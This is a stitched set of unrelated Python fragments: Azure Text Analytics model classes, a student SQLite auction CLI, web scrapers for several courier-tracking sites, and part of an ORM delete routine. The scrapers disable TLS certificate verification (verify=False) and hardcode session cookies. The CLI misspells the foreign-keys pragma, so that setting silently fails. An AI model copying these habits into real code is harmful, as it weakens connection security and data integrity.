:param language: Language used in the data source.
:type language: str
:param data_source_entity_id: Unique identifier of the recognized entity from the data
source.
:type data_source_entity_id: str
:param url: URL to the entity's page from the data source.
:type url: str
:param data_source: Data source used to extract entity linking,
such as Wiki/Bing etc.
:type data_source: str
"""
def __init__(self, **kwargs):
self.name = kwargs.get("name", None)
self.matches = kwargs.get("matches", None)
self.language = kwargs.get("language", None)
self.data_source_entity_id = kwargs.get("data_source_entity_id", None)
self.url = kwargs.get("url", None)
self.data_source = kwargs.get("data_source", None)
@classmethod
def _from_generated(cls, entity):
return cls(
name=entity.name,
matches=[LinkedEntityMatch._from_generated(e) for e in entity.matches], # pylint: disable=protected-access
language=entity.language,
data_source_entity_id=entity.id,
url=entity.url,
data_source=entity.data_source,
)
def __repr__(self):
return "LinkedEntity(name={}, matches={}, language={}, data_source_entity_id={}, url={}, " \
"data_source={})".format(self.name, repr(self.matches), self.language, self.data_source_entity_id,
self.url, self.data_source)[:1024]
class LinkedEntityMatch(DictMixin):
"""A match for the linked entity found in text. Provides
the confidence score of the prediction and where the entity
was found in the text.
:param score: If a well-known item is recognized, a
decimal number denoting the confidence level between 0 and 1 will be
returned.
:type score: float
:param text: Entity text as appears in the request.
:type text: str
:param grapheme_offset: Start position (in Unicode characters) for the
entity match text.
:type grapheme_offset: int
:param grapheme_length: Length (in Unicode characters) for the entity
match text.
:type grapheme_length: int
"""
def __init__(self, **kwargs):
self.score = kwargs.get("score", None)
self.text = kwargs.get("text", None)
self.grapheme_offset = kwargs.get("grapheme_offset", None)
self.grapheme_length = kwargs.get("grapheme_length", None)
@classmethod
def _from_generated(cls, match):
return cls(
score=match.score, text=match.text, grapheme_offset=match.offset, grapheme_length=match.length
)
def __repr__(self):
return "LinkedEntityMatch(score={}, text={}, grapheme_offset={}, grapheme_length={})" \
.format(self.score, self.text, self.grapheme_offset, self.grapheme_length)[:1024]
class TextDocumentInput(MultiLanguageInput):
"""The input document to be analyzed by the service.
:param id: Required. A unique, non-empty document identifier.
:type id: str
:param text: Required. The input text to process.
:type text: str
:param language: This is the 2 letter ISO 639-1 representation
of a language. For example, use "en" for English; "es" for Spanish etc. If
not set, uses "en" for English as default.
:type language: str
"""
def __init__(self, **kwargs):
super(TextDocumentInput, self).__init__(**kwargs)
self.id = kwargs.get("id", None)
self.text = kwargs.get("text", None)
self.language = kwargs.get("language", None)
def __repr__(self):
return "TextDocumentInput(id={}, text={}, language={})" \
.format(self.id, self.text, self.language)[:1024]
class TextDocumentBatchStatistics(DictMixin):
"""TextDocumentBatchStatistics contains information about the
request payload. Note: This object is not returned
in the response and needs to be retrieved by a response hook.
:param document_count: Number of documents submitted in the request.
:type document_count: int
:param valid_document_count: Number of valid documents. This
excludes empty, over-size limit or non-supported languages documents.
:type valid_document_count: int
:param erroneous_document_count: Number of invalid documents.
This includes empty, over-size limit or non-supported languages documents.
:type erroneous_document_count: int
:param transaction_count: Number of transactions for the request.
:type transaction_count: long
"""
def __init__(self, **kwargs):
self.document_count = kwargs.get("document_count", None)
self.valid_document_count = kwargs.get("valid_document_count", None)
self.erroneous_document_count = kwargs.get("erroneous_document_count", None)
self.transaction_count = kwargs.get("transaction_count", None)
@classmethod
def _from_generated(cls, statistics):
if statistics is None:
return None
return cls(
document_count=statistics["documentsCount"],
valid_document_count=statistics["validDocumentsCount"],
erroneous_document_count=statistics["erroneousDocumentsCount"],
transaction_count=statistics["transactionsCount"],
)
def __repr__(self):
return "TextDocumentBatchStatistics(document_count={}, valid_document_count={}, erroneous_document_count={}, " \
"transaction_count={})".format(self.document_count, self.valid_document_count,
self.erroneous_document_count, self.transaction_count)[:1024]
class SentenceSentiment(DictMixin):
"""SentenceSentiment contains the predicted sentiment and
confidence scores for each individual sentence in the document.
:param sentiment: The predicted Sentiment for the sentence.
Possible values include: 'positive', 'neutral', 'negative'
:type sentiment: str
:param confidence_scores: The sentiment confidence score between 0
and 1 for the sentence for all labels.
:type confidence_scores:
~azure.ai.textanalytics.SentimentConfidenceScores
:param grapheme_offset: The sentence offset from the start of the
document.
:type grapheme_offset: int
:param grapheme_length: The length of the sentence by Unicode standard.
:type grapheme_length: int
:param warnings: The warnings generated for the sentence.
:type warnings: list[str]
"""
def __init__(self, **kwargs):
self.sentiment = kwargs.get("sentiment", None)
self.confidence_scores = kwargs.get("confidence_scores", None)
self.grapheme_offset = kwargs.get("grapheme_offset", None)
self.grapheme_length = kwargs.get("grapheme_length", None)
self.warnings = | |
<filename>Launcher.py
import sqlite3
import time
import hashlib
from os import system, name
import getpass
import re
import traceback
import random
import string
connection = None
cursor = None
LoggedUser = None
LoggedUserName = None
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def connect(path):
global connection, cursor
connection = sqlite3.connect(path)
cursor = connection.cursor()
cursor.execute(' PRAGMA forteign_keys=ON; ')
connection.commit()
return
def define_tables():
global connection, cursor
tables = open("/home/manzi/Desktop/CMPUT291Mini-Project1/prj-tables.sql","r")
contents = tables.read()
cursor.executescript(contents)
connection.commit()
return
def insert_data():
global connection, cursor
# TODO fill in test data
datafile = open("/home/manzi/Desktop/CMPUT291Mini-Project1/test_data.sql","r")
contents = datafile.read()
cursor.executescript(contents)
connection.commit()
return
def saleFunctions(sale):
global connection, cursor, LoggedUser, LoggedUserName
clear()
cursor.execute(''' SELECT s.lister, s.descr, s.edate, s.cond, MAX(b.amount), COUNT(r.reviewee) AS Num_Rev, AVG(r.rating)
FROM sales s, bids b, reviews r
WHERE b.sid = s.sid AND s.lister = r.reviewee AND lower(s.sid) = :usale
GROUP BY s.lister, s.descr, s.edate, s.cond
UNION
SELECT s.lister, s.descr, s.edate, s.cond, s.rprice, COUNT(r.reviewee), AVG(r.rating)
FROM sales s, bids b, reviews r
WHERE lower(s.sid) = :usale AND b.sid = s.sid AND s.lister = r.reviewee AND s.sid NOT IN (SELECT b.sid FROM bids b)
GROUP BY s.lister, s.descr, s.edate, s.cond;
''', {"usale":sale})
rows = cursor.fetchall()
print("SALE DESCRIPTION:\n")
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
print("PRODUCT DESCRIPTION:\n")
cursor.execute(''' SELECT p.pid, p.descr, COUNT(DISTINCT pr.rid) AS Num_Rev, AVG(pr.rating)
FROM products p, previews pr, sales s
WHERE pr.pid = p.pid AND s.pid = p.pid AND s.sid = :usale
GROUP BY p.pid, p.descr;
''',{"usale":sale})
rows = cursor.fetchall()
if(not(rows)):
print("Product hasn't been reviewed yet!\n")
else:
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
uchoice = input("Please select one of the following options:\n 1) Place a bid \n 2) List Sales of Seller \n 3) List all reviews of the seller \n 4) Go back ")
if(uchoice == '4'):
return
elif(uchoice == '1'):
cursor.execute("SELECT MAX(amount) FROM bids WHERE sid = :usale;", {"usale":sale})
row = cursor.fetchone()
print(row[0])
while(True):
amount = input("Enter bid ammount: ")
try:
amount = float(amount)
except ValueError:
print("Invalid Input!")
continue
if(amount > row[0]):
break
else:
print("Bid amount can't be less than the current maximum bid!\n")
while(True):
bid = randomString(20)
cursor.execute("SELECT bid FROM bids WHERE bid = :ubid;", {"ubid": bid})
rows = cursor.fetchall()
if(not(rows)):
cursor.execute("INSERT INTO bids VALUES (:ubid, :ubidder, :usid, datetime('now'), :uamount);", {"ubid": bid, "ubidder": LoggedUser, "usid": sale, "uamount":amount})
connection.commit()
break
else:
continue
elif(uchoice == '2'):
cursor.execute("SELECT lister FROM sales WHERE sid = :usale;",{"usale": sale})
row = cursor.fetchone()
lister = row[0]
cursor.execute(''' SELECT s.sid, s.descr, MAX(b.amount), cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s, bids b
WHERE s.lister = :ulister AND s.sid = b.sid AND s.edate > datetime('now')
GROUP BY s.sid, s.descr
UNION
SELECT s.sid, s.descr, s.rprice, cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s
WHERE s.lister = :ulister AND s.sid NOT IN (SELECT b.sid FROM bids b)
GROUP BY s.sid, s.descr
ORDER BY Days, Hours, Minutes;
''',{"ulister":lister})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
while(True):
uchoice = input("Select a Sale or enter 'b' to go back... ")
if(uchoice == 'b' or uchoice == 'B'):
break
try:
uchoice = int(uchoice)
except ValueError:
print("Not a number!")
continue
if(uchoice > 0 and uchoice < len(rows) + 1):
selectedSale = rows[uchoice - 1][0]
saleFunctions(selectedSale)
else:
print("\nInvalid Response!\n")
elif(uchoice == '3'):
cursor.execute("SELECT lister FROM sales WHERE sid = :usale;",{"usale": sale})
row = cursor.fetchone()
lister = row[0]
cursor.execute("SELECT * FROM reviews WHERE reviewee = :ulister; ", {"ulister": lister})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
def ListProductsMoreFeatures(pid, productName):
global connection, cursor, LoggedUser, LoggedUserName
while(True):
clear()
userchoice = input(" Product Selected: %s\n Select one of the following options:\n 1) Write a review for this product \n 2) List all reviews for this product \n 3) List all active sales associated to this product\n 4) Go back to Product Listing " % productName)
if(userchoice == '1'):
while(True):
reviewText = input("\nType a review: \n")
if(reviewText == ""):
print("Review Can't be empty!")
continue
else:
break
while(True):
rating = input("Enter a rating from 1 to 5 inclusive: ")
try:
rating = float(rating)
except ValueError:
print("\nThat's not a number!\n")
continue
if(rating < 1 or rating >5):
print("Invalid Rating!")
continue
else:
break
cursor.execute("SELECT MAX(rid) FROM previews;")
row = cursor.fetchone()
rid = None
while(True):
rid = row[0] + 1
cursor.execute("SELECT rid FROM previews WHERE rid = :urid;", {"urid": rid})
rows = cursor.fetchall()
if(not(rows)):
break
else:
continue
cursor.execute("INSERT INTO previews VALUES (:urid, :upid, :ureviewer, :urating, :urtext, datetime('now'));", {"urid": rid, "upid": pid, "ureviewer": LoggedUser, "urating": rating, "urtext": reviewText})
connection.commit()
elif(userchoice == '2'):
pid = pid.lower()
cursor.execute("SELECT rid, reviewer, rtext, rdate FROM previews WHERE lower(pid) = :upid;", {"upid": pid})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
a = input("Press 'Enter' to go back...")
if(a):
pass
elif(userchoice == '3'):
pid = pid.lower()
cursor.execute(''' SELECT s.sid, s.descr, MAX(b.amount), cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s, bids b
WHERE lower(s.pid) = :pid AND s.sid = b.sid AND s.edate > datetime('now')
GROUP BY s.sid, s.descr
UNION
SELECT s.sid, s.descr, s.rprice, cast((julianday(s.edate)-julianday('now')) as int) AS Days, cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) AS Hours, cast(( ((julianday(s.edate)-julianday('now'))*1440) - (cast((julianday(s.edate)-julianday('now')) as int)*1440) - (cast(((julianday(s.edate)-julianday('now')) * 24 - cast((julianday(s.edate)-julianday('now')) as int) *24) as int) * 60) ) as int) AS Minutes
FROM sales s
WHERE lower(s.pid) = :pid AND s.sid NOT IN (SELECT b.sid FROM bids b)
GROUP BY s.sid, s.descr
ORDER BY Days, Hours, Minutes;
''',{"pid":pid})
rows = cursor.fetchall()
# Print the table
print()
print()
print(" ", end = "")
for key in rows[0].keys():
print(key, end = "\t\t")
print()
for i in range(1, len(rows) + 1):
print(str(i) + ") " , end = "")
for item in rows[i-1]:
print(item, end = "\t\t")
print()
print()
print()
while(True):
uchoice = input("Select a Sale or enter 'b' to go back... ")
if(uchoice == 'b' or uchoice == 'B'):
return
try:
uchoice | |
from bs4 import BeautifulSoup
import requests
from datetime import datetime
from selenium import webdriver
from time import sleep
from dateutil.parser import parse
__author__ = '<NAME>'
class Tracker(object):
'''
This class contains the common features of each of the below trackers
Each has the following Attributes:
tracking_no: Tracking number of the shipment
page: Raw HTML data of the page
tracking_data: A list of checkpoints of the shipment
status: The current/overall status of the shipment
'''
def __init__(self,tracking_no):
'''
Returns a Scraper Object containing the above Attributes
'''
self.tracking_no = str(tracking_no)
self.page = None
self.tracking_data = []
self.status = None
def Get_Tracking_Data(self):
'''
Helper function to get the tracking_data
'''
self.Get_Page()
self.Extract_Checkpoints()
class BluedartTracker(Tracker):
'''
This class scrapes tracking data from the bluedart website.
'''
exclude_list = ['Location','Date','Waybill','Details','No.']
def __init__(self,tracking_no):
Tracker.__init__(self,tracking_no)
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
url = 'http://www.bluedart.com/servlet/RoutingServlet'
data = {'handler' : 'tnt',
'action' : 'awbquery',
'awb' : 'awb' ,
'numbers' : self.tracking_no}
# request the server for the HTML data
response = requests.post(url,data=data,verify=False)
self.page = response.content
def is_valid(self,text):
for unwanted in self.exclude_list:
if text is None or unwanted in text:
return False
return True
def Extract_Checkpoints(self):
'''
Extract the checkpoints and store in self.tracking_data
'''
# Make sure page is available
if self.page is None:
raise Exception("The HTML data was not fetched due to some reasons")
# Check for invalid tracking number
if 'Numbers Not Found -'in self.page or 'Invalid Query Numbers -' in self.page:
raise ValueError('The Tracking number is invalid')
soup = BeautifulSoup(self.page,'html.parser')
# Assign the current status of the shipment
if 'Returned To Origin' in self.page: # Prioritise this first
self.status = 'R'
elif 'SHIPMENT DELIVERED' in self.page: # If the above is false, only then check for this
self.status = 'C'
else: # The shipment is in Transit
self.status = 'T'
# Checkpoints extraction begins here
cells = []
'''
The below for loop goes through the table of checkpoints adding relevant cell data to cells[]
'''
for cell in soup.findAll('td', {"align" : "LEFT"}):
if cell.font["size"] == '1':
cell_text = cell.font.string
if self.is_valid(cell_text):
cells.append(cell_text)
# 4 cells in each row
rows = [cells[cell:cell + 4] for cell in xrange(0, len(cells), 4)]
for row in rows:
'''
Each row will have 4 columns: Location--Status--Date--Time
Merge column three and four and format it.
Append to tracking_data list
'''
location = row[0]
status = row[1]
date_time = ' '.join((row[2],row[3]))
date_time_format = "%d-%b-%Y %H:%M"
date_time = datetime.strptime(date_time,date_time_format)
self.tracking_data.append({'status':status,'date':date_time,'location':location})
# Sort the checkpoints based on Date and Time --- this is important
self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class AramexTracker(Tracker):
'''
This class scrapes data from the Aramex website
'''
def __init__(self, tracking_no):
Tracker.__init__(self,tracking_no)
def wait_till_page_load(self,driver,max_wait_time):
'''
This method pauses execution until the page is loaded fully, including
data delayed by JavaScript
'''
sleepCount = max_wait_time # wait for a fixed max_wait_time only
# A page that's fully loaded has the word 'Current Status'
while 'Current Status' not in driver.page_source:
sleep(1)
sleepCount -= 1
if sleepCount is 0:
raise Exception('Request timed out!') # if max_wait_time is exceeded!
def remove_non_ascii(self,str_to_clean):
return ''.join([x for x in str_to_clean if ord(x) < 128])
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
# Simply encode the correct url as a string
url = 'https://www.aramex.com/express/track-results-multiple.aspx?ShipmentNumber='
url += self.tracking_no
driver = webdriver.PhantomJS() # create a selenium webdriver
driver.get(url) # make it send a request with the above url
self.wait_till_page_load(driver,10) # wait till the page is fully loaded
self.page = driver.page_source # store the html source
driver.quit() # stop the webdriver
def Extract_Checkpoints(self):
'''
Extract the checkpoints and store in self.tracking_data
'''
# Make sure page is available
if self.page is None:
raise Exception("The HTML data was not fetched due to some reasons")
# Check for invalid tracking number
if 'Invalid number / data not currently available' in self.page:
raise ValueError('Invalid number/data not currently available')
# Checkpoints extraction begins here
soup = BeautifulSoup(self.page,'html.parser')
# Assign the current status of the shipment - self.status
current_status = soup.find('span',id='spnCurrentStatusValue').text.strip()
if current_status == 'Supporting Document Returned to Shipper':
self.status = 'R'
elif current_status == 'Delivered':
self.status = 'C'
else: # The shipment is in Transit
self.status = 'T'
# Get all rows of the Checkpoints table (no particular order)
rows = soup.findAll('div',{'class':'fullWidth odd leftFloat bottomGreyBorder'})
rows += soup.findAll('div',{'class':'fullWidth even leftFloat bottomGreyBorder'})
for row in rows:
# Get the data
location = row.find('div',{'class':'leftFloat thirdWidth'}).string.strip()
date_time = row.find('div',{'class':'leftFloat shipmentSummaryLabel'}).string.strip()
status = row.find('div',{'class':'leftFloat shipmentHistoryActivityLabel'}).string.strip()
# Clean it
location = self.remove_non_ascii(location)
date_time_format = "%d-%b-%Y %H:%M"
date_time = parse(self.remove_non_ascii(date_time))
status = self.remove_non_ascii(status)
# Add it to the checkpoint list
self.tracking_data.append({'status':status,'date':date_time,'location':location})
self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class DHLTracker(Tracker):
'''
This class scrapes data from the DHL website
'''
def __init__(self, tracking_no):
Tracker.__init__(self,tracking_no)
def wait_till_page_load(self,driver,max_wait_time):
'''
This method pauses execution until the page is loaded fully, including
data delayed by JavaScript
'''
sleepCount = max_wait_time # wait for a fixed max_wait_time only
# A page that's fully loaded has the word 'Current Status'
while self.tracking_no not in driver.page_source and 'Invalid Input' not in driver.page_source:
sleep(1)
sleepCount -= 1
if sleepCount is 0:
raise Exception('Request timed out!') # if max_wait_time is exceeded!
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
# Simply encode the correct url as a string
url = 'http://www.dhl.co.in/en/express/tracking.html?AWB={}&brand=DHL'.format(self.tracking_no)
driver = webdriver.PhantomJS() # create a selenium webdriver
driver.get(url) # make it send a request with the above url
self.wait_till_page_load(driver,10) # wait till the page is fully loaded
self.page = driver.page_source # store the html source
driver.quit() # stop the webdriver
def Extract_Checkpoints(self):
'''
Extract the checkpoints and store in self.tracking_data
'''
# Make sure page is available
if self.page is None:
raise Exception("The HTML data was not fetched due to some reasons")
soup = BeautifulSoup(self.page,'html.parser')
# Check for invalid tracking number by checking if table element is present
if soup.find('thead') == None:
raise ValueError('Invalid tracking number')
# Assign the current status of the shipment - self.status
if 'Returned' in self.page:
self.status = 'R'
elif 'Signed for by:' in self.page:
self.status = 'C'
else: # The shipment is in Transit
self.status = 'T'
# The full checkpoints table div.
table = soup.find('table',{'class':'result-checkpoints'}).contents
cur_date = None # The date of the next few checkpoints, initially None
checkpoint = None
for element in table:
if element.name == 'thead':
# This has the date for the next few checkpoints
cur_date = element.find('th',{'colspan':'2'}).string.strip() + ' '
elif element.name == 'tbody':
# A checkpoint whose date = cur_date
checkpoint = {'status':'','date':cur_date,'location':''}
tds = element.findAll('td')
checkpoint['status'] = tds[1].string.strip()
checkpoint['location'] = tds[2].string.strip()
checkpoint['date'] += tds[3].string.strip()
date_time_format = "%d-%b-%Y %H:%M"
checkpoint['date'] = parse(checkpoint['date'])
self.tracking_data.append(checkpoint)
self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Skynet_Tracker(Tracker):
'''
This class scrapes tracking data from the Skynet website.
'''
def __init__(self,tracking_no):
Tracker.__init__(self,tracking_no)
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
url = 'https://www.skynetwwe.info/ShipmentTrackSingle.aspx?textfield={}&radiobutton=SB'.format(self.tracking_no)
headers = {
'Host': 'www.skynetwwe.info',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Cookie': 'ASP.NET_SessionId=aletb2fx1kqixq55kmblbvn4',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0'
}
# request the server for the HTML data
response = requests.post(url,headers=headers,verify=False)
self.page = response.content
def Extract_Checkpoints(self):
'''
Extract the checkpoints and store in self.tracking_data
'''
# Make sure page is available
if self.page is None:
raise Exception("The HTML data was not fetched due to some reasons")
soup = BeautifulSoup(self.page,'html.parser')
invalid_tracking_no = soup.find('span',{'id':'ctl00_ContentPlaceHolder1_lblsMsg','class':'ErrorMessage','style':'font-family:Calibri;font-size:9pt;font-weight:bold;','name':'lblsMsg'})
if invalid_tracking_no is not None:
raise ValueError('The Tracking number is invalid')
# Assign the current status of the shipment
if 'Delivered' in self.page:
self.status = 'C'
else: # The shipment is in Transit
self.status = 'T'
# Checkpoints extraction begins here
rows = soup.findAll('tr',{'class':'gridItem'}) + soup.findAll('tr',{'class':'gridAltItem'})
for row in rows:
'''
Each row will have 4 columns: Date--Time--Status--Location
Merge column one and two and format it.
Append to tracking_data list
'''
row_cells = row.findAll('td')
date = row_cells[0].string.strip()
time = row_cells[1].string.strip()
date_time = ' '.join([date,time])
date_time_format = "%d %b %Y %H:%M"
date_time = datetime.strptime(date_time,date_time_format)
status = row_cells[2].string.strip()
location = row_cells[3].string.strip()
self.tracking_data.append({'status':status,'date':date_time,'location':location})
# Sort the checkpoints based on Date and Time --- this is important
self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Overnite_Tracker(Tracker):
'''
This class scrapes tracking data from the Overnite express website.
'''
def __init__(self,tracking_no):
Tracker.__init__(self,tracking_no)
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
url = 'http://www.overnitenet.com/Web-Track.aspx'
data = {
'__EVENTTARGET':'',
'__EVENTARGUMENT':'',
'__VIEWSTATE':'/<KEY>',
'__EVENTVALIDATION':'/<KEY>',
'ctl00$Content$rb':'rdAwbNo',
'ctl00$Content$txtAWB':self.tracking_no,
'ctl00$Content$ValidatorCalloutExtender6_ClientState':'',
'ctl00$Content$imgbtnTrack.x':'28',
'ctl00$Content$imgbtnTrack.y':'8'
}
headers = {
'Host': 'www.overnitenet.com',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Referer': 'http://www.overnitenet.com/Web-Track.aspx',
'Cookie': 'ASP.NET_SessionId=3ncsag55xq0z4vqltg3egbr4',
'Connection': 'keep-alive'
}
# request the server for the HTML data
response = requests.post(url,data=data,headers=headers,verify=False)
self.page = response.content
def Extract_Checkpoints(self):
'''
Extract the checkpoints and store in self.tracking_data
'''
# Make sure page is available
if self.page is None:
raise Exception("The HTML data was not fetched due to some reasons")
soup = BeautifulSoup(self.page,'html.parser')
if 'Delivery information not found' in self.page:
raise ValueError('The Tracking number is invalid/Tracking number is over 45 days old.')
# Assign the current status of the shipment
if 'Delivered on' in self.page:
self.status = 'C'
else: # The shipment is in Transit
self.status = 'T'
# Checkpoints extraction begins here
table = soup.findAll('table',{'cellpadding':'1','cellspacing':'1','border':'1','align':'center','style':"width:800px;border-color:#034291;"})[1]
rows = table.findAll('tr')[1:]
for row in rows:
'''
Each row will have 3 columns: Date--Location--Status
'''
row_cells = row.findAll('td')
date = row_cells[0].string.strip()
date = datetime.strptime(date,"%A, %B %d, %Y")
location = row_cells[1].find('a').string.strip()
if location is '': # ignore the days which are holidays
continue
status = row_cells[2].text.strip()
self.tracking_data.append({'status':status,'date':date,'location':location})
# Sort the checkpoints based on Date and Time --- this is important
self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Ecomm_Tracker(Tracker):
'''
This class scrapes tracking data from the Ecomm express website.
'''
def __init__(self,tracking_no):
Tracker.__init__(self,tracking_no)
def Get_Page(self):
'''
Fetches raw HTML data from the site for a given tracking_no
'''
url = 'https://billing.ecomexpress.in/track_me/multipleawb_open/?awb={}&order=&news_go=track+now'.format(self.tracking_no)
data = {
'awb':self.tracking_no,
'order':'',
'news_go':'track_now'
}
headers = {
'Host': 'billing.ecomexpress.in',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Connection': 'keep-alive'
}
# request the server for the HTML data
response = requests.get(url,data=data,headers=headers,verify=False)
self.page = response.content
def Extract_Checkpoints(self):
'''
Extract the checkpoints | |
new_dbval)
NOT_FOUND = object()
for attrs in obj._composite_keys_:
for attr in attrs:
if attr in avdict: break
else: continue
vals = [ get_val(a.name, NOT_LOADED) for a in attrs ]
currents = tuple(vals)
for i, attr in enumerate(attrs):
new_dbval = avdict.get(attr, NOT_FOUND)
if new_dbval is NOT_FOUND: continue
vals[i] = new_dbval
vals = tuple(vals)
cache.db_update_composite_index(obj, attrs, currents, vals)
for attr, new_dbval in avdict.iteritems():
obj._vals_[attr.name] = new_dbval
def _delete_(obj, undo_funcs=None):
status = obj._status_
if status in del_statuses: return
is_recursive_call = undo_funcs is not None
if not is_recursive_call: undo_funcs = []
cache = obj._cache_
cache.noflush += 1
try:
get_val = obj._vals_.get
undo_list = []
undo_dict = {}
def undo_func():
obj._status_ = status
if status in ('loaded', 'saved'):
to_be_checked = cache.to_be_checked
if to_be_checked and to_be_checked[-1] is obj: to_be_checked.pop()
assert obj not in to_be_checked
obj._vals_.update((attr.name, val) for attr, val in undo_dict.iteritems())
for index, old_key in undo_list: index[old_key] = obj
undo_funcs.append(undo_func)
try:
for attr in obj._attrs_:
reverse = attr.reverse
if not reverse: continue
if not attr.is_collection:
val = get_val(attr.name, NOT_LOADED)
if val is None: continue
if not reverse.is_collection:
if val is NOT_LOADED: val = attr.load(obj)
if val is None: continue
if attr.cascade_delete: val._delete_()
elif not reverse.is_required: reverse.__set__(val, None, undo_funcs)
else: throw(ConstraintError, "Cannot delete object %s, because it has associated %s, "
"and 'cascade_delete' option of %s is not set"
% (obj, attr.name, attr))
elif isinstance(reverse, Set):
if val is NOT_LOADED: pass
else: reverse.reverse_remove((val,), obj, undo_funcs)
else: throw(NotImplementedError)
elif isinstance(attr, Set):
set_wrapper = attr.__get__(obj)
if not set_wrapper.__nonzero__(): pass
elif attr.cascade_delete:
for robj in set_wrapper: robj._delete_()
elif not reverse.is_required: attr.__set__(obj, (), undo_funcs)
else: throw(ConstraintError, "Cannot delete object %s, because it has non-empty set of %s, "
"and 'cascade_delete' option of %s is not set"
% (obj, attr.name, attr))
else: throw(NotImplementedError)
for attr in obj._simple_keys_:
val = get_val(attr.name, NOT_LOADED)
if val is NOT_LOADED: continue
if val is None and cache.ignore_none: continue
index = cache.indexes.get(attr)
if index is None: continue
obj2 = index.pop(val)
assert obj2 is obj
undo_list.append((index, val))
for attrs in obj._composite_keys_:
vals = tuple(get_val(a.name, NOT_LOADED) for a in attrs)
if NOT_LOADED in vals: continue
if cache.ignore_none and None in vals: continue
index = cache.indexes.get(attrs)
if index is None: continue
obj2 = index.pop(vals)
assert obj2 is obj
undo_list.append((index, vals))
if status == 'created':
obj._status_ = 'cancelled'
assert obj in cache.created
cache.created.remove(obj)
for attr in obj._attrs_:
if attr.pk_offset is not None: continue
obj._vals_.pop(attr.name, None)
if attr.is_collection:
mc = cache.modified_collections.get(attr)
if mc is not None: mc.discard(obj)
if obj._pkval_ is not None:
pk = obj.__class__.__dict__['_pk_']
del cache.indexes[pk][obj._pkval_]
else:
if status == 'updated': cache.updated.remove(obj)
elif status in ('loaded', 'saved'): cache.to_be_checked.append(obj)
else: assert status == 'to_be_checked'
obj._status_ = 'deleted'
cache.modified = True
cache.deleted.append(obj)
except:
if not is_recursive_call:
for undo_func in reversed(undo_funcs): undo_func()
raise
finally:
cache.noflush -= 1
@cut_traceback
def delete(obj):
if not obj._cache_.is_alive: throw_db_session_is_over(obj)
obj._delete_()
@cut_traceback
